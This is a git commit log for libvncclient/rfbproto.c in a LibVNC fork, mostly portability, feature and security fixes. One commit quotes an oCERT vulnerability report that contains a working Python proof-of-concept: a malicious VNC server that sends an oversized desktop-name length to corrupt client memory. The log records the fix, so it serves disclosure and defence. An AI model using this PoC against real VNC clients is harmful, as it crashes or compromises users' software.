path: root/libvncclient/rfbproto.c
Commit message [Author, Age, Files, Lines]
* Merge tag 'LibVNCServer-0.9.12' [Slávek Banko, 2019-02-06, 1, -171/+167]
|\
| |     Signed-off-by: Slávek Banko <slavek.banko@axis.cz>
| * LibVNCClient: remove now-useless cast [Christian Beier, 2019-01-06, 1, -1/+1]
| |     re #273
| * LibVNCClient: fail on server-sent desktop name lengths longer than 1MB [Christian Beier, 2019-01-06, 1, -2/+6]
| |     re #273
| * Merge pull request #267 from veyon/external-lzo [Christian Beier, 2018-12-29, 1, -0/+4]
| |\
| | |     Allow to use global LZO library instead of miniLZO
| | * Allow to use global LZO library instead of miniLZO [Tobias Junghans, 2018-11-22, 1, -0/+4]
| | |     The complete LZO library nowadays is installed on many systems so we can optionally make use of it and omit internal miniLZO implementation.
| * | LibVNCClient: ignore server-sent reason strings longer than 1MB [Christian Beier, 2018-12-29, 1, -24/+21]
| | |     Fixes #273
| * | LibVNCClient: ignore server-sent cut text longer than 1MB [Christian Beier, 2018-12-29, 1, -0/+5]
| |/
| |     This is in line with how LibVNCServer does it (28afb6c537dc82ba04d5f245b15ca7205c6dbb9c) and fixes part of #273.
| * Merge pull request #263 from veyon/custom-auth-handlers [Christian Beier, 2018-11-18, 1, -0/+29]
| |\
| | |     LibVNCClient: add support for custom auth handlers
| | * LibVNCClient: add support for custom auth handlers [Tobias Junghans, 2018-11-11, 1, -0/+29]
| | |     This allows to register custom authentication handlers in order to support additional security types.
| * | Merge pull request #261 from veyon/misc-fixes [Christian Beier, 2018-11-07, 1, -0/+1]
| |\ \
| | | |     Misc fixes
| | * | LibVNCClient: init pad field for set encodings msg [Tobias Junghans, 2018-11-06, 1, -0/+1]
| | |/
| * | common: d3des: drop unused rfbCPKey() [Tobias Junghans, 2018-11-07, 1, -1/+0]
| |/
| * LibVNCClient: fix three possible heap buffer overflows [Christian Beier, 2018-09-29, 1, -4/+6]
| |     An attacker could feed `0xffffffff`, causing a `malloc(0)` for the buffers which are subsequently written to.
| |     Closes #247
| * LibVNCClient: fix possible infinite loop [Christian Beier, 2018-09-29, 1, -1/+1]
| |     Closes #251
| * LibVNCClient: don't leak uninitialised memory to remote [Christian Beier, 2018-09-29, 1, -0/+2]
| |     The pad fields of the rfbClientCutTextMsg and rfbKeyEventMsg could contain arbitrary memory belonging to the process, don't leak this to the remote.
| |     Closes #252
| * When connecting to a repeater, only send initialised string [Christian Beier, 2018-09-29, 1, -2/+6]
| |     Closes #253
| * Merge pull request #203 from dcommander/turbovnc-client [Christian Beier, 2018-01-23, 1, -13/+0]
| |\
| | |     Include Tight decoding optimizations from TurboVNC
| | * Include Tight decoding optimizations from TurboVNC [DRC, 2018-01-22, 1, -13/+0]
| | |     - As with the encoder, the decoder now uses the TurboJPEG wrapper, which allows it to decode JPEG images directly into the framebuffer. This eliminates a buffer copy (CopyRectangle()) as well as the expensive RGB pixel conversion in DecompressJpegRectBPP(). The TurboJPEG wrapper performs RGB pixel conversion more optimally, and only when necessary (it uses the libjpeg-turbo colorspace extensions when available, in order to avoid RGB conversion.)
| | |     - The other Tight subencoding types are also now decoded directly into the framebuffer, which eliminates buffer copies.
| | |     - The Tight decoder now supports the rfbTightNoZlib extension, which allows the server to bypass zlib compression when Compression Level 0 is selected. The encoder already supports this extension. Passing the data stream through zlib when Compression Level 0 is selected needlessly wastes CPU time, since all zlib is doing is copying the data internally into its own structures.
| * | Add trle decoder [Wiki Wang, 2017-09-15, 1, -0/+63]
| |/
| * libvncclient: rename rfbsasl.[c|h] to sasl.[c|h] to be in line with naming of other files [Christian Beier, 2017-09-02, 1, -1/+1]
| |
| * Move HAVE_SASL #ifdefs into header file to have less LOC [Christian Beier, 2017-09-02, 1, -3/+0]
| |
| * Added SASL authentication support [simon, 2017-06-25, 1, -0/+26]
| |     Added SASL support to OpenSSL
| * Add function pointers for every type of rectangle [Balazs Ludmany, 2016-06-29, 1, -103/+3]
| |
* | Removed _BSD_SOURCE, _SVID_SOURCE, _GNU_SOURCE, _XOPEN_SOURCE. [Michele Calgaro, 2018-10-08, 1, -5/+0]
| |     Signed-off-by: Michele Calgaro <michele.calgaro@yahoo.it>
* | Merge tag 'LibVNCServer-0.9.11' of https://github.com/LibVNC/libvncserver [Slávek Banko, 2017-10-14, 1, -23/+40]
|\ \
| | |     Conflicts:
| | |         CMakeLists.txt
| | |         libvncserver/main.c
| * | Fix building on OSX. [Christian Beier, 2016-11-24, 1, -1/+1]
| | |
| * | Fix heap overflows in the various rectangle fill functions [Josef Gajdusek, 2016-11-14, 1, -0/+24]
| |/
| |     Although rfbproto.c does check whether the overall FramebufferUpdate rectangle is too large, some of the individual encoding decoders do not, which allows a malicious server to overwrite parts of the heap.
| * Merge pull request #110 from AlexejStukov/patch-1 [Christian Beier, 2016-04-12, 1, -1/+2]
| |\
| | |     break statement out of case
| | * break statement out of case [Norrec, 2016-04-07, 1, -1/+2]
| | |
| * | Fix buffer overflow when applying client encodings [zbierak, 2016-04-12, 1, -1/+2]
| |/
| * Ignore null pointers in FillRectangle() and CopyRectangleFromRectangle() [SpaceOne, 2016-01-27, 1, -0/+8]
| |
| * Re-add the useful bits of 9aa9ac59b4cb10bfca93456a3098e348de172d7f. [Christian Beier, 2015-04-17, 1, -0/+4]
| |
| * Revert "LibVNCClient: Add H.264 encoding for framebuffer updates" [Christian Beier, 2015-04-17, 1, -24/+0]
| |     This reverts commit d891478ec985660c03f95cffda0e6a1ad4ba350c.
| |     Conflicts:
| |         configure.ac
| |         libvncclient/h264.c
| * Merge pull request #69 from nopdotcom/master [Christian Beier, 2015-04-17, 1, -1/+4]
| |\
| | |     Avoid divide-by-zero in raw encoding (OSX RealVNC)
| | * Avoid divide-by-zero in raw encoding (OSX RealVNC) [Jay Carlson, 2015-03-27, 1, -1/+4]
| | |     OS X RealVNC server crashes out Remmina because the server can provoke bytesPerLine to be zero. Assume this is coding for zero lines. The condition could be checked before the calculation of bytesPerLine. I don’t understand the preconditions of this code to say one way or the other.
* | | Add hooks to client library to obtain network and authentication status [Timothy Pearson, 2015-01-12, 1, -6/+41]
|/ /
* | Initialize libgcrypt before use [Floris Bos, 2015-01-02, 1, -0/+10]
|/
|     https://www.gnupg.org/documentation/manuals/gcrypt/Initializing-the-library.html
|     "Before the library can be used, it must initialize itself. This is achieved by invoking the function gcry_check_version"
|     Closes issue #45
|     Tested with krdc + libgcrypt 1.6.1 (libgcrypt20-dev Ubuntu package) connecting to a Mac Mini.
|     Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* Fix possible libvncclient ServerInit memory corruption. [Christian Beier, 2014-10-10, 1, -1/+2]
|     This fixes the following oCERT report (oCERT-2014-008 pt.2):
|
|     There is a similar vulnerability to the previous one I sent. This is related to the ServerInit message where the width, the height of the server's framebuffer, its pixel format, and the name are sent to the client. The name can be used in a malicious manner to trigger a memory corruption in the client.
|
|     Field         Size
|     ---------------------------------
|     name-length   [4]
|     name-string   [name-length]
|
|     Below you will find a PoC script to show the vulnerability. This was tested on Fedora 20 with the latest version of krdc.
|
|     I have noticed something, where the memory corruption causes the program to hang but allows you to try to disconnect. After this it hangs. Occasionally there will be segmentation fault in memcpy. This can become more reliable if you connect to a different VNC server first (Or the wrong port on the malicious server) then connecting to the malicious port. Every time I accidentally made the wrong VNC connection attempt the next time I connected it segfault'd.
|
|     Just run the script it will listen on port 5900 and connect to it with krdc for example. I have observed Remmina crash more reliably.
|
|         import socket,struct,sys
|         HOST = ""
|         PORT = 5900
|
|         c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|         c.bind((HOST,PORT))
|         c.listen(1)
|
|         conn,addr = c.accept()
|         print "Connected by ", addr
|
|         protocolVersion3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
|         conn.send(protocolVersion3008)
|         data = conn.recv(1024) # Receive the version from them.
|
|         secTypeNone = "\x01\x01"
|         secTypeAuth = "\x01\x02"
|         conn.send(secTypeNone)
|         data = conn.recv(1024) # Receive the secType choice from them.
|
|         secResultOk = "\x00" * 4
|         secResultNo = "\x00\x00\x00\x01"
|         conn.send(secResultOk)
|         data = conn.recv(1024) # Receive the ClientInit (Shared-flag).
|
|         frameBufferWidth = 0x0480
|         frameBufferHeight = 0x0360
|         bitsPerPixel = 0x20
|         depth = 0x18
|         bigEndian = 0x1
|         trueColor = 0x0
|         redM = 0x0
|         greenM = 0x0
|         blueM = 0x0
|         redS = 0x0
|         greenS = 0x0
|         blueS = 0x0
|         padding = "\x00\x00\x00"
|         nameLength = 0xffffffff
|         nameString = "AA" * 0xFFFF + "\x00\x0a"
|
|         conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth, frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM, greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I", nameLength) + nameString )
|
|         c.close()
* `strings.h` and `resolv.h` are not available on MSVC, and some POSIX functions are renamed or deprecated [Daniel Cohen Gindi, 2014-09-20, 1, -1/+6]
|     For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* MSVC: Use _snprintf instead of snprintf [Daniel Cohen Gindi, 2014-09-02, 1, -0/+4]
|     In Microsoft's Visual C runtime, the snprintf() function is actually called _snprintf. Let's just #define the former to call the latter.
|     [JES: fixed commit message]
|     Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix indentation [Johannes Schindelin, 2014-08-16, 1, -2/+2]
|     Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Check for MallocFrameBuffer() return value [newsoft, 2014-08-15, 1, -3/+7]
|     If MallocFrameBuffer() returns FALSE, frame buffer pointer is left to NULL. Subsequent writes into that buffer could lead to memory corruption, or even arbitrary code execution.
* Initialize padding in SetFormatAndEncodings' rfbSetPixelFormatMsg. [Matthias Treydte, 2014-06-23, 1, -0/+2]
|
* libvncclient: If we have TLS support, enable VeNCrypt by default [Johannes Schindelin, 2014-04-05, 1, -0/+3]
|     Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* LibVNCClient: Add H.264 encoding for framebuffer updates [David Verbeiren, 2013-01-25, 1, -0/+24]
|     This patch implements support in LibVNCClient for framebuffer updates encoded as H.264 frames. Hardware accelerated decoding is performed using VA API.
|
|     This is experimental support to let the community explore the possibilities offered by the potential bandwidth and latency reductions that H.264 encoding allows. This may be particularly useful for use cases such as online gaming, hosted desktops, hosted set top boxes...
|
|     This patch only provides the client side support and is meant to be used with corresponding server-side support, as provided by an upcoming patch for qemu ui/vnc module (to view the display of a virtual machine executing under QEMU).
|
|     With this H.264-based encoding, if multiple framebuffer update messages are generated for a single server framebuffer modification, the H.264 frame data is sent only with the first update message. Subsequent update framebuffer messages will contain only the coordinates and size of the additional updated regions.
|
|     Instructions/Requirements:
|     * The patch should be applied on top of the previous patch I submitted with minor enhancements to the gtkvncviewer application: http://sourceforge.net/mailarchive/message.php?msg_id=30323804
|     * Currently only works with libva 1.0: use branch "v1.0-branch" for libva and intel-driver. Those can be built as follows:
|         cd libva
|         git checkout v1.0-branch
|         ./autogen.sh
|         make
|         sudo make install
|         cd ..
|         git clone git://anongit.freedesktop.org/vaapi/intel-driver
|         cd intel-driver
|         git checkout v1.0-branch
|         ./autogen.sh
|         make
|         sudo make install
|
|     Signed-off-by: David Verbeiren <david.verbeiren@intel.com>
* Include strings.h for strncasecmp(3) [Raphael Kubo da Costa, 2012-09-14, 1, -0/+1]
|
* Tune the definitions needed when building with -ansi. [Raphael Kubo da Costa, 2012-09-14, 1, -0/+1]
|     The current definitions were mostly useful to glibc and followed its feature_test_macros(3) documentation.
|     However, this means other platforms still had problems when building with strict compilation flags. _BSD_SOURCE, for example, is only recognized by glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the removal of some definitions (such as the outdated _POSIX_SOURCE one).
|     _POSIX_SOURCE also had to be conditionally defined in some places, as what it enables or disables during compilation varies across systems.
* Fix some compiler warnings that hinted some not too unimportant errors. [Christian Beier, 2012-05-09, 1, -2/+2]
|
* LibVNCClient: #undef these types in case it's WIN32. [Christian Beier, 2012-05-03, 1, -4/+4]
|     The various other headers include windows.h and the winsock headers which give an error when SOCKET and socklen_t are already defined.
* Added support for UltraVNC Single Click as originally proposed by Noobius (Boobius) on 6/1/11. [Monkey, 2012-04-23, 1, -0/+8]
|     Original thread: http://sourceforge.net/tracker/?func=detail&aid=3310255&group_id=32584&atid=405860